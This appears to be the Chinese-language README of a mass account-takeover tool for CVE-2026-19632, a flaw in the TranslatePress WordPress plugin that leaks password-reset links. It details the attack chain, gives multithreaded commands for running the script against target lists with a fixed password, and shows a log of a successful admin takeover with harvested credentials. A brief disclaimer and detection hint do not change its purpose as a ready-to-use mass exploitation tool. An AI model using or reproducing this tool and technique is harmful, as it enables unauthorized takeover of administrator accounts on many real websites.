针对 CVE-2026-19632 的大规模账户接管工具,该漏洞是 TranslatePress – Multilingual WordPress 插件(≤ 3.3.1)中因密码重置链接泄露导致的未认证账户接管。每个目标列表只需一条命令——完整攻击链自动执行,每次成功接管都会在发生的瞬间写入输出文件。
免责声明——仅限授权使用。 此工具会更改真实账户密码并触发真实的密码重置邮件。请仅将其用于您拥有或已获得明确书面许可测试的系统。 作者对任何滥用行为概不负责。
| CVE | CVE-2026-19632 |
| 产品 | TranslatePress – Multilingual(WordPress 插件,slug translatepress-multilingual),由 Cozmoslabs 开发 |
| 受影响版本 | 所有 ≤ 3.3.1 的版本(400,000+ 活跃安装) |
| 已修复版本 | 3.3.2(修复:在公共字典 AJAX 处理器上添加 current_user_can 检查) |
| CVSS 3.1 | 9.8 严重 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H(CNA:Wordfence) |
| CWE | CWE-200(敏感信息泄露)+ CWE-640(弱密码恢复机制) |
| 影响 | 未认证管理员账户接管 |
trp_data,其中包含 get_translations nonce。未登录访客的 nonce 按设计是公开的;插件依赖它们来保证安全。wp_mail 并以收件人的语言环境翻译外发邮件。
当匿名攻击者为个人资料语言环境为已发布次要语言的管理员触发 wp-login.php?action=lostpassword 时,
整封重置邮件——包括包含有效重置密钥的明文 wp-login.php?action=rp
URL——会在攻击者的请求内同步插入到
wp_trp_dictionary_<default>_<locale> 中。SMTP 甚至不需要正常工作。trp_get_translations_regular 注册为
wp_ajax_nopriv,且在 3.3.2 之前仅验证公共 nonce。
任何人都可以通过 string_ids 枚举字典并提取密钥。完整技术报告:CVE-2026-19632-REPORT.md
cve-2026-19632.py一个自包含的脚本,可为列表中的每个目标执行完整攻击链:
readme.txt 回退)trp_data + 语言切换器探测)url|username|password 追加到输出文件
(刷新、线程安全、无需等待运行结束)内置健壮性:
--new-password 使用固定密码)。pip install -r requirements.txt
# 针对目标列表完整执行,20 个线程
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 20
# 为每个目标使用固定密码
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --new-password 'Pwn3d!2026'
# 通过代理
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --proxy http://127.0.0.1:8080
针对实验室实例(WordPress 7.0.4 + TranslatePress 3.3.1,
ar 默认 → en_US 次要)的终端日志——值已脱敏:
[00:09:06] [INFO] CVE-2026-19632 takeover tool - 3 target(s), 3 thread(s)...
[00:09:06] [SKIP] http://example.com (no TranslatePress)
[00:09:07] [INFO] http://TARGET TP found - langs: ar->en_US, nonce=a1b2c3d4e5
[00:09:09] [INFO] username candidates: ['admin', ...]
[00:09:09] [WARN] attempt 1/3 failed (stale key)
[00:09:09] [WARN] attempt 2/3 failed (stale key)
[00:09:09] [WARN] attempt 3/3 failed (stale key)
[00:09:09] [INFO] all keys stale - fresh reset trigger...
[00:09:15] [TAKEOVER] http://TARGET SUCCESS - user='admin' password='Pwn3d!2026'
[00:09:15] [INFO] done. summary: ERROR=1 | SKIP=1 | TAKEOVER=1
vuln.txt(实时写入,在成功的那一刻):
http://TARGET|admin|Pwn3d!2026
将
vuln.txt视为敏感文件——它包含实时凭据 和/或有效的重置密钥。请将其添加到.gitignore。
不需要: 正常工作的邮件服务器(URL 在 wp_mail
过滤器内部存储,在发送尝试之前)。
admin-ajax.php 日志,查找使用公共 security nonce 的连续 string_ids 枚举。| 日期 | 事件 |
|---|---|
| 2026-08-12 | CVE-2026-19632 保留 |
| 2026-08-13 | TranslatePress 3.3.2 发布并包含修复 |
| 2026-08-25/26 | Wordfence 发布公告;24 小时内阻止了 8,618 次利用尝试 |
| 2026-08-28 | ThaiCERT 公告 |
momopon1415)和 Wordfence 团队,已在 3.3.2 变更日志中致谢。MIT © 2026 ghostpel
| 选项 | 说明 |
|---|
-l, --list | 每行一个目标 URL 的文件(允许 # 注释) |
-o, --output | 结果文件,格式 url|username|password(默认 vuln.txt) |
-t, --threads | 并发工作线程数(默认 10) |
--new-password | 所有目标的固定密码(默认:每个目标随机 14 字符) |
--timeout | 每次请求的超时时间(秒)(默认 15) |
--proxy | HTTP 代理,例如 http://127.0.0.1:8080 |
--no-color | 禁用彩色输出 |